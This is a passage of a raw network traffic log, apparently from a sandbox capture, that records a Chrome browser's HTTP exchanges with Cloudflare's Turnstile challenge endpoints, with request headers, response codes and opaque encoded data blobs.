cebDs0p3VA/gIHdFcUcBQsc1Gz6UYURVRUedz1GLqxsbAdSlMU4Lze9oGZ5xlUFb6UKlnX+mcXU10IC9mNH5ePoY8KRBuhggk69vg==$8ODEj1QtDZtr5y6ml0mAIA== Server: cloudflare CF-RAY: 92612945cc3a58af-EWR alt-svc: h3=":443"; ma=86400
2025-03-25 20:29:35 UTC	254	IN	Data Raw: 75 33 75 55 66 71 75 37 75 61 4b 36 76 70 57 34 70 4a 65 31 78 36 79 72 6b 4a 47 72 78 59 32 7a 6b 5a 54 4b 7a 62 75 74 71 39 58 5a 77 4d 6e 4c 75 2b 54 6d 6d 4d 2f 6c 30 39 36 38 36 37 32 37 75 71 2b 6a 34 38 37 30 77 2b 66 52 78 76 6a 4f 35 39 7a 79 75 66 53 2f 76 64 72 38 2f 63 2f 35 41 41 48 6e 41 77 66 4a 79 76 66 59 7a 4d 76 6e 38 41 73 47 41 52 49 42 39 65 62 6e 36 76 41 4f 39 42 44 31 38 50 44 68 49 76 72 6b 42 78 49 49 48 43 51 57 2b 69 45 43 44 41 59 6a 45 50 34 76 41 53 38 61 2b 69 67 63 46 76 34 73 48 2f 30 37 47 79 50 39 4f 79 67 37 4a 53 45 61 50 45 6c 41 52 54 74 53 52 53 30 68 56 46 56 48 51 54 63 4e 56 45 70 5a 59 42 39 50 55 78 6b 73 4c 55 49 78 48 6d 70 58 4b 52 35 63 53 46 63 69 62 47 74 30 5a 32 4e 4b 61 45 42 72 59 30 77 36 5a 6b Data Ascii: u3uUfqu7uaK6vpW4pJe1x6yrkJGrxY2zkZTKzbutq9XZwMnLu+TmmM/l09686727uq+j4870w+fRxvjO59zyufS/vdr8/c/5AAHnAwfJyvfYzMvn8AsGARIB9ebn6vAO9BD18PDhIvrkBxIIHCQW+iECDAYjEP4vAS8a+igcFv4sH/07GyP9Oyg7JSEaPElARTtSRS0hVFVHQTcNVEpZYB9PUxksLUIxHmpXKR5cSFcibGt0Z2NKaEBrY0w6Zk
2025-03-25 20:29:35 UTC	1369	IN	Data Raw: 64 59 61 7a 68 57 55 6d 39 6c 64 6c 64 6e 64 58 4a 48 64 6c 6c 70 69 48 71 4a 68 6d 71 53 61 6d 4e 55 6c 32 4e 6f 62 6d 6c 31 64 6f 2b 55 58 6c 78 36 67 56 79 56 6b 32 61 53 61 71 6d 6d 6f 5a 70 75 6b 4a 36 71 65 35 32 53 74 62 53 67 63 58 61 34 6c 33 65 66 76 4b 74 36 67 6e 36 6a 77 4a 79 39 66 36 61 6b 77 63 43 4b 67 4c 33 48 6f 74 43 73 72 62 58 55 71 71 4c 47 79 73 75 63 76 4e 79 74 6d 70 66 42 34 5a 2b 38 76 38 54 48 70 4c 6a 4d 72 4e 72 4e 7a 4b 2b 78 32 76 4c 30 77 4b 2f 31 38 2b 4c 49 2f 50 62 50 31 74 6a 55 77 65 44 44 2b 76 44 37 77 38 43 2f 33 66 33 39 31 76 63 4a 7a 2b 6a 78 43 73 2f 7a 30 41 6e 68 38 4f 50 35 38 4f 6b 51 37 76 4c 72 48 52 6e 34 41 50 34 6e 2b 69 6f 6a 42 53 4d 42 4b 65 34 70 4b 75 73 65 4d 51 6b 6a 4a 43 37 32 39 53 73 61 4d Data Ascii: dYazhWUm9ldldndXJHdllpiHqJhmqSamNUl2Nobml1do+UXlx6gVyVk2aSaqmmoZpukJ6qe52StbSgcXa4l3efvKt6gn6jwJy9f6akwcCKgL3HotCsrbXUqqLGysucvNytmpfB4Z+8v8THpLjMrNrNzK+x2vL0wK/18+LI/PbP1tjUweDD+vD7w8C/3f391vcJz+jxCs/z0Anh8OP58OkQ7vLrHRn4AP4n+iojBSMBKe4pKuseMQkjJC729SsaM
2025-03-25 20:29:35 UTC	1369	IN	Data Raw: 61 67 34 55 36 59 48 4e 34 53 31 68 49 59 31 78 78 62 46 39 71 55 49 47 46 62 34 4e 6d 6b 47 52 55 55 46 61 54 66 70 61 63 6c 46 75 51 68 58 75 43 65 61 70 6a 72 6d 43 65 6e 34 75 6e 66 32 31 75 6f 6f 4b 74 6c 34 64 34 73 72 31 30 6c 49 43 75 74 49 75 57 68 62 43 30 6c 71 71 30 76 4c 2b 4a 6f 37 6d 72 78 4b 6a 4a 73 38 61 32 73 63 36 6a 75 70 57 77 78 73 37 54 33 61 32 37 76 74 65 39 7a 36 54 43 76 72 33 43 33 4d 62 47 35 64 36 6f 77 4d 37 4a 72 62 53 33 36 4d 66 78 31 2b 66 4d 32 39 66 31 7a 4d 4c 59 42 4c 66 2b 33 2b 48 54 38 76 54 6d 32 75 50 75 36 75 33 4b 35 78 54 52 43 74 41 4e 34 39 4c 58 45 2b 62 64 31 79 44 79 33 79 41 45 34 77 4d 4a 38 67 67 43 47 41 45 49 2f 67 44 35 35 7a 44 2b 42 78 58 31 45 67 67 37 4d 79 62 30 43 78 33 37 4f 7a 59 52 4c 6a Data Ascii: ag4U6YHN4S1hIY1xxbF9qUIGFb4NmkGRUUFaTfpaclFuQhXuCeapjrmCen4unf21uooKtl4d4sr10lICutIuWhbC0lqq0vL+Jo7mrxKjJs8a2sc6jupWwxs7T3a27vte9z6TCvr3C3MbG5d6owM7JrbS36Mfx1+fM29f1zMLYBLf+3+HT8vTm2uPu6u3K5xTRCtAN49LXE+bd1yDy3yAE4wMJ8ggCGAEI/gD55zD+BxX1Egg7Myb0Cx37OzYRLj
2025-03-25 20:29:35 UTC	1369	IN	Data Raw: 68 6b 71 4b 53 6f 71 4a 68 6d 4f 43 55 57 4a 72 67 49 65 53 65 33 5a 72 6e 58 43 42 6d 6e 47 63 64 33 6d 63 6f 35 79 54 59 58 36 63 6a 6e 75 65 71 4a 35 6b 69 4b 71 49 72 4b 47 56 6a 6f 61 38 62 71 79 2f 66 70 61 59 6e 48 76 44 6e 38 65 58 6b 72 79 42 77 70 32 37 79 36 44 4f 6a 70 33 44 78 39 62 4d 77 74 43 6b 30 64 79 35 76 4c 75 6f 7a 63 72 6a 6e 62 4c 53 74 37 4b 6f 70 4c 6d 68 70 74 6e 76 33 4c 44 49 34 2f 53 7a 79 72 44 78 30 4e 72 35 35 62 7a 36 37 65 66 66 76 74 63 44 42 74 33 78 42 63 63 49 34 74 69 2b 2f 4e 72 6f 32 64 72 67 43 41 41 58 47 42 67 4e 37 41 2f 6b 46 39 67 4d 48 77 73 43 32 2b 30 63 42 76 6a 35 46 76 6e 63 47 42 76 39 36 75 34 46 48 69 6b 76 4c 43 34 6c 41 6a 58 31 4f 53 6b 35 2f 44 76 38 2b 43 74 45 44 42 41 62 46 51 56 46 52 54 63 Data Ascii: hkqKSoqJhmOCUWJrgIeSe3ZrnXCBmnGcd3mco5yTYX6cjnueqJ5kiKqIrKGVjoa8bqy/fpaYnHvDn8eXkryBwp27y6DOjp3Dx9bMwtCk0dy5vLuozcrjnbLSt7KopLmhptnv3LDI4/SzyrDx0Nr55bz67effvtcDBt3xBccI4ti+/Nro2drgCAAXGBgN7A/kF9gMHwsC2+0cBvj5FvncGBv96u4FHikvLC4lAjX1OSk5/Dv8+CtEDBAbFQVFRTc
2025-03-25 20:29:35 UTC	1369	IN	Data Raw: 6e 35 2b 5a 48 42 4a 55 34 47 53 69 31 4a 64 66 58 4f 4a 63 56 79 54 6d 6e 56 77 59 6f 64 69 6b 34 74 72 6d 36 4a 37 6d 57 78 2b 6d 36 69 53 72 58 43 73 69 48 61 4e 6d 70 4a 31 6e 5a 6d 74 67 5a 36 59 67 5a 43 42 68 6e 76 4a 6c 4c 36 49 78 36 61 68 70 62 44 51 73 4c 47 32 79 70 50 54 71 63 7a 62 30 36 76 4c 79 2b 44 55 6c 64 71 79 78 62 48 67 74 64 62 6b 75 64 62 48 75 4d 36 38 32 37 4f 74 71 2f 62 32 30 4d 4c 32 35 64 6e 63 33 2f 6e 66 7a 37 72 37 33 4f 49 49 30 4e 37 69 2b 50 58 59 2b 38 34 4b 30 41 49 4d 30 4e 38 47 47 4f 7a 6b 34 67 54 30 47 68 50 37 39 74 62 36 41 52 30 4e 38 75 4c 68 2f 67 55 4c 42 4f 6f 71 46 77 48 37 35 2f 6f 41 4c 2f 51 70 45 43 66 30 43 7a 49 54 42 78 49 34 38 67 73 62 50 42 73 62 48 6b 44 36 45 78 74 45 49 79 49 65 53 41 4d 61 Data Ascii: n5+ZHBJU4GSi1JdfXOJcVyTmnVwYodik4trm6J7mWx+m6iSrXCsiHaNmpJ1nZmtgZ6YgZCBhnvJlL6Ix6ahpbDQsLG2ypPTqczb06vLy+DUldqyxbHgtdbkudbHuM6827Otq/b20ML25dnc3/nfz7r73OII0N7i+PXY+84K0AIM0N8GGOzk4gT0GhP79tb6AR0N8uLh/gULBOoqFwH75/oAL/QpECf0CzITBxI48gsbPBsbHkD6ExtEIyIeSAMa
2025-03-25 20:29:35 UTC	1369	IN	Data Raw: 57 54 6a 32 70 70 65 70 35 35 58 36 42 66 64 35 56 64 71 4a 64 70 64 6e 79 63 66 5a 6c 6f 67 59 4f 65 69 58 35 74 72 59 78 76 67 6f 4f 76 64 71 79 4f 6c 6f 6d 54 71 35 74 36 76 4a 43 58 73 37 6e 41 6b 38 6d 61 77 49 37 48 7a 49 53 69 6b 4c 4c 57 71 38 79 7a 32 4c 4c 45 32 73 69 37 71 37 75 68 73 4a 71 74 73 4c 2f 65 34 4c 6a 71 33 4d 7a 4f 70 65 7a 67 36 63 2b 72 79 38 72 76 7a 50 6a 73 35 4d 7a 74 35 74 73 43 37 2b 72 61 38 2f 72 30 2b 74 41 48 32 51 50 37 41 67 76 65 2b 41 7a 66 37 4f 62 53 7a 75 48 79 39 51 33 4e 39 2f 76 7a 48 51 49 57 45 42 51 62 44 79 62 78 45 76 4c 6f 4a 69 7a 66 48 41 63 48 2b 51 44 79 4d 41 6b 75 42 69 49 69 46 53 63 71 2b 78 30 36 4f 78 6b 37 45 43 41 61 4a 68 77 58 50 67 73 73 51 51 77 6d 4c 41 67 73 4d 69 77 7a 46 44 59 35 51 Data Ascii: WTj2ppep55X6Bfd5VdqJdpdnycfZlogYOeiX5trYxvgoOvdqyOlomTq5t6vJCXs7nAk8mawI7HzISikLLWq8yz2LLE2si7q7uhsJqtsL/e4Ljq3MzOpezg6c+ry8rvzPjs5Mzt5tsC7+ra8/r0+tAH2QP7Agve+Azf7ObSzuHy9Q3N9/vzHQIWEBQbDybxEvLoJizfHAcH+QDyMAkuBiIiFScq+x06Oxk7ECAaJhwXPgssQQwmLAgsMiwzFDY5Q
2025-03-25 20:29:35 UTC	1369	IN	Data Raw: 57 6b 35 36 59 66 6e 47 42 6d 6c 70 6c 58 4a 65 56 65 59 2b 6c 69 32 32 76 6b 49 39 7a 69 4b 4b 77 69 36 70 33 6b 5a 4f 61 6c 6e 76 43 76 4a 2b 77 73 72 53 50 65 73 69 71 6c 35 6e 4d 71 6f 6d 64 71 49 6d 66 79 71 6d 67 6b 4b 4f 50 32 36 53 61 6e 4b 6d 6e 6d 4b 6e 4c 6f 75 4f 37 73 4b 57 68 76 36 44 45 36 38 43 6e 72 71 66 75 37 37 2f 7a 73 2f 4b 74 39 50 4f 35 30 38 58 70 38 37 71 37 2f 4f 76 30 7a 65 38 43 39 4e 45 47 43 50 77 45 39 65 4d 49 7a 66 30 4d 30 65 45 49 30 64 51 45 38 42 41 58 43 39 50 64 31 74 6b 4d 44 50 49 6a 49 4e 7a 78 41 64 38 6b 43 41 4d 68 42 53 50 69 42 44 49 45 45 51 44 31 36 54 50 77 42 6a 59 5a 43 44 63 35 47 51 34 59 47 43 41 69 41 7a 4d 68 50 43 41 61 4a 45 68 4d 48 79 4e 4d 55 6b 49 69 4a 55 41 53 49 6c 6b 37 4f 69 55 55 58 53 Data Ascii: Wk56YfnGBmlplXJeVeY+li22vkI9ziKKwi6p3kZOalnvCvJ+wsrSPesiql5nMqomdqImfyqmgkKOP26SanKmnmKnLouO7sKWhv6DE68Cnrqfu77/zs/Kt9PO508Xp87q7/Ov0ze8C9NEGCPwE9eMIzf0M0eEI0dQE8BAXC9Pd1tkMDPIjINzxAd8kCAMhBSPiBDIEEQD16TPwBjYZCDc5GQ4YGCAiAzMhPCAaJEhMHyNMUkIiJUASIlk7OiUUXS
2025-03-25 20:29:35 UTC	1369	IN	Data Raw: 67 70 43 68 67 71 4e 38 62 59 78 2f 5a 6f 69 6a 6f 61 46 79 63 6f 4b 79 6b 4c 69 6f 6b 72 65 72 74 34 6a 42 6a 70 36 54 74 48 69 69 68 63 43 57 6f 6f 62 4a 72 62 32 4f 7a 5a 43 65 6a 36 75 78 77 63 4b 68 7a 39 61 6d 79 35 71 79 32 37 72 55 77 37 62 54 31 4e 75 30 77 37 62 4b 33 75 50 42 36 64 79 38 37 73 33 6b 73 38 54 43 35 4f 36 31 39 62 54 37 7a 4e 37 74 39 73 72 75 30 2f 44 37 30 50 30 43 33 2b 45 45 35 67 48 64 38 4e 48 51 37 74 2f 64 35 68 58 73 34 52 73 55 37 64 54 35 36 66 51 6a 36 74 76 30 4a 76 72 39 2f 51 58 32 35 79 51 62 49 4f 37 70 38 66 45 65 4d 79 6f 59 4c 53 50 77 43 43 6b 62 44 6a 41 38 4c 42 4d 52 45 6a 45 41 51 78 6f 55 41 42 73 55 44 52 70 4e 54 53 74 4d 54 55 55 6e 49 41 35 46 4c 43 51 57 4d 44 42 65 50 30 31 50 49 46 41 74 51 55 55 Data Ascii: gpChgqN8bYx/ZoijoaFycoKykLiokrert4jBjp6TtHiihcCWoobJrb2OzZCej6uxwcKhz9amy5qy27rUw7bT1Nu0w7bK3uPB6dy87s3ks8TC5O619bT7zN7t9sru0/D70P0C3+EE5gHd8NHQ7t/d5hXs4RsU7dT56fQj6tv0Jvr9/QX25yQbIO7p8fEeMyoYLSPwCCkbDjA8LBMREjEAQxoUABsUDRpNTStMTUUnIA5FLCQWMDBeP01PIFAtQUU
2025-03-25 20:29:35 UTC	1369	IN	Data Raw: 4b 6d 77 63 4b 4f 50 72 58 4f 4e 67 36 42 30 65 4c 69 49 63 6f 5a 35 6d 34 75 61 6b 4b 7a 46 77 38 4b 52 75 49 4f 38 79 61 79 4a 6d 4a 2b 4d 6b 63 69 78 6c 49 79 78 6f 70 62 4e 31 36 66 55 74 70 57 39 6e 72 66 42 72 65 58 68 6f 4e 66 51 31 4b 48 57 36 4c 2b 37 75 36 4c 75 30 62 44 41 36 74 4c 47 74 73 4c 49 74 66 61 33 35 2b 36 79 79 62 6e 56 34 63 37 31 43 4d 66 53 38 38 6e 5a 43 38 6e 65 41 78 4c 68 37 65 6e 6c 42 66 66 33 46 76 49 49 37 68 7a 6d 43 42 34 58 31 42 54 38 34 67 45 6a 2f 53 58 7a 4a 68 59 4b 48 69 67 4c 48 68 4c 2b 45 78 51 50 4e 4f 37 76 44 77 63 76 4a 2f 58 36 2b 44 59 54 4d 68 4d 58 49 30 6a 36 42 41 6c 45 50 78 63 6e 50 52 46 4f 43 53 6b 52 46 68 56 41 4e 53 68 44 54 43 39 65 4d 69 68 52 51 55 51 6b 57 46 4d 36 55 54 59 67 54 44 6b 2b Data Ascii: KmwcKOPrXONg6B0eLiIcoZ5m4uakKzFw8KRuIO8yayJmJ+MkcixlIyxopbN16fUtpW9nrfBreXhoNfQ1KHW6L+7u6Lu0bDA6tLGtsLItfa35+6yybnV4c71CMfS88nZC8neAxLh7enlBff3FvII7hzmCB4X1BT84gEj/SXzJhYKHigLHhL+ExQPNO7vDwcvJ/X6+DYTMhMXI0j6BAlEPxcnPRFOCSkRFhVANShDTC9eMihRQUQkWFM6UTYgTDk+

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:35 UTC	638	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:35 UTC	442	IN	HTTP/1.1 400 Bad Request Date: Tue, 25 Mar 2025 20:29:35 GMT Content-Type: application/json Content-Length: 14 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: MV7x4wPLXdgnh4LWyHR8ubzauadZlkGruxmPEhMSISr8f1OS5mieowy1f2yxGsGkHk8KXut/9q30H/sO9/j47w==$b+10VSMSZdoP15kmqpzH5w== Server: cloudflare CF-RAY: 9261294b6f1ecef2-EWR alt-svc: h3=":443"; ma=86400
2025-03-25 20:29:35 UTC	14	IN	Data Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d Data Ascii: {"err":100280}

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:37 UTC	856	OUT	GET /cdn-cgi/challenge-platform/h/b/pat/9261293dee55c468/1742934575128/d51fc97ff5482a0e04d34c34824eb01eb3128cda53b4a0f70f6023263fe47e26/uPY28BXx41_v6Yh HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:37 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Tue, 25 Mar 2025 20:29:37 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 1 Connection: close
2025-03-25 20:29:37 UTC	2015	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 31 52 5f 4a 66 5f 56 49 4b 67 34 45 30 30 77 30 67 6b 36 77 48 72 4d 53 6a 4e 70 54 74 4b 44 33 44 32 41 6a 4a 6a 5f 6b 66 69 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g1R_Jf_VIKg4E00w0gk6wHrMSjNpTtKD3D2AjJj_kfiYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2025-03-25 20:29:37 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:37 UTC	827	OUT	GET /cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfd HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:38 UTC	200	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:38 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 926129592a474408-EWR alt-svc: h3=":443"; ma=86400
2025-03-25 20:29:38 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 07 08 02 00 00 00 87 a9 fa 6f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRoIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:38 UTC	1191	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 39252 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: text/plain;charset=UTF-8 cf-chl: 5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI cf-chl-ra: 0 sec-ch-ua-mobile: ?0 Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:38 UTC	16384	OUT	Data Raw: 49 6d 6c 70 7a 66 36 53 72 48 6c 69 57 43 2b 36 6e 61 4d 30 6c 4c 77 61 6b 61 67 70 57 37 37 43 42 36 52 61 58 70 55 35 50 36 73 61 4d 37 66 35 36 54 61 78 31 61 36 72 37 6d 61 4b 61 43 37 57 55 24 63 61 6f 44 66 46 61 24 41 57 31 6a 59 61 48 57 36 4f 61 6c 72 61 33 67 36 42 75 47 4f 61 35 37 61 42 35 75 6c 6b 57 61 62 61 66 6e 34 61 4d 70 66 57 72 61 24 5a 57 61 48 61 6c 57 36 55 61 69 6d 61 49 49 48 66 54 56 31 61 49 63 6d 42 6c 38 36 61 64 61 55 42 61 4c 47 42 4c 4c 63 73 52 55 66 56 32 67 70 36 49 58 63 6c 44 6a 63 70 61 62 4b 36 31 55 61 36 38 61 75 35 6e 66 4b 6a 37 61 75 47 33 35 37 63 4a 6c 44 61 78 37 48 4b 6b 24 54 6c 7a 61 61 56 73 50 61 61 59 67 79 53 61 37 4d 6c 61 58 44 61 45 35 5a 37 38 61 55 2b 2b 38 37 42 4c 2d 44 36 64 35 70 61 64 32 37 Data Ascii: Imlpzf6SrHliWC+6naM0lLwakagpW77CB6RaXpU5P6saM7f56Tax1a6r7maKaC7WU$caoDfFa$AW1jYaHW6Oalra3g6BuGOa57aB5ulkWabafn4aMpfWra$ZWaHalW6UaimaIIHfTV1aIcmBl86adaUBaLGBLLcsRUfV2gp6IXclDjcpabK61Ua68au5nfKj7auG357cJlDax7HKk$TlzaaVsPaaYgySa7MlaXDaE5Z78aU++87BL-D6d5pad27
2025-03-25 20:29:38 UTC	16384	OUT	Data Raw: 5a 31 5a 46 59 66 4f 38 59 74 64 66 6b 24 36 4c 5a 37 6f 55 55 66 66 52 77 59 35 55 6d 6a 33 6d 53 71 79 55 76 4c 57 48 69 72 4b 70 41 72 46 44 42 49 72 51 42 6f 6a 68 6c 62 72 37 70 66 49 4a 76 2d 42 57 6b 48 36 4c 70 36 61 43 55 75 4e 6a 43 76 7a 30 6f 66 59 42 61 6f 69 70 75 6d 36 6a 6d 30 70 75 2d 42 50 68 43 32 6a 43 44 4d 61 53 62 30 6d 36 66 7a 69 2d 66 2d 72 6c 57 69 2d 36 24 69 53 67 43 74 37 69 36 59 61 35 37 43 63 36 66 44 30 37 69 49 57 44 61 31 37 75 55 70 58 61 57 37 75 51 42 51 51 75 33 4b 24 6e 4b 6d 30 78 36 48 69 6d 78 31 66 77 52 69 79 6e 7a 4b 70 54 42 56 6d 42 4b 4c 24 37 2b 70 38 6d 31 6b 44 2b 37 61 50 4b 34 37 52 5a 66 72 55 73 53 56 6d 59 6e 44 51 63 33 35 49 72 55 64 37 43 61 4c 44 7a 56 57 6a 44 30 71 66 69 61 66 44 43 49 61 77 Data Ascii: Z1ZFYfO8Ytdfk$6LZ7oUUffRwY5Umj3mSqyUvLWHirKpArFDBIrQBojhlbr7pfIJv-BWkH6Lp6aCUuNjCvz0ofYBaoipum6jm0pu-BPhC2jCDMaSb0m6fzi-f-rlWi-6$iSgCt7i6Ya57Cc6fD07iIWDa17uUpXaW7uQBQQu3K$nKm0x6Himx1fwRiynzKpTBVmBKL$7+p8m1kD+7aPK47RZfrUsSVmYnDQc35IrUd7CaLDzVWjD0qfiafDCIaw
2025-03-25 20:29:38 UTC	6484	OUT	Data Raw: 41 4b 4b 2b 31 24 41 41 78 52 54 62 4c 62 42 78 56 55 49 47 77 42 34 51 4d 43 48 41 41 55 4b 53 77 52 50 61 6c 39 5a 61 58 78 2b 62 52 61 39 72 53 56 75 72 66 79 61 39 34 47 57 36 45 41 62 34 38 57 36 4d 61 52 66 37 71 6d 74 70 4e 32 24 44 36 44 61 4a 7a 67 7a 75 6a 57 6e 50 4a 59 4e 39 49 66 79 30 37 66 58 74 35 42 67 6c 4a 33 31 46 71 35 6c 73 77 4b 52 71 37 74 55 63 46 52 68 4a 47 61 41 5a 70 67 39 54 66 50 4c 56 34 58 45 63 55 52 56 70 30 6a 58 47 6e 34 35 75 73 35 48 54 62 24 47 38 68 75 47 53 30 30 39 61 32 49 2b 69 43 43 58 2d 41 37 7a 30 6e 56 7a 61 39 4f 56 6b 75 45 6f 35 66 4a 57 4c 74 4e 77 32 4b 7a 4c 41 74 2b 4c 38 45 35 39 7a 75 70 36 45 69 7a 5a 66 61 42 37 66 4e 37 6e 75 50 24 46 54 47 35 34 49 4a 61 32 4b 32 37 49 44 61 69 24 43 2b 68 74 Data Ascii: AKK+1$AAxRTbLbBxVUIGwB4QMCHAAUKSwRPal9ZaXx+bRa9rSVurfya94GW6EAb48W6MaRf7qmtpN2$D6DaJzgzujWnPJYN9Ify07fXt5BglJ31Fq5lswKRq7tUcFRhJGaAZpg9TfPLV4XEcURVp0jXGn45us5HTb$G8huGS009a2I+iCCX-A7z0nVza9OVkuEo5fJWLtNw2KzLAt+L8E59zup6EizZfaB7fN7nuP$FTG54IJa2K27IDai$C+ht
2025-03-25 20:29:39 UTC	322	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:39 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 28140 Connection: close cf-chl-gen: b2x82DgV1sXisNmvjWHd7IRqHFhvvF6nSCpu6EgM0MhvrgIE36iuYsmZ5bbreY49$IG1dZcxxCHeXfJ7QV6MV6w== Server: cloudflare CF-RAY: 9261295e0f8e4e4d-EWR alt-svc: h3=":443"; ma=86400
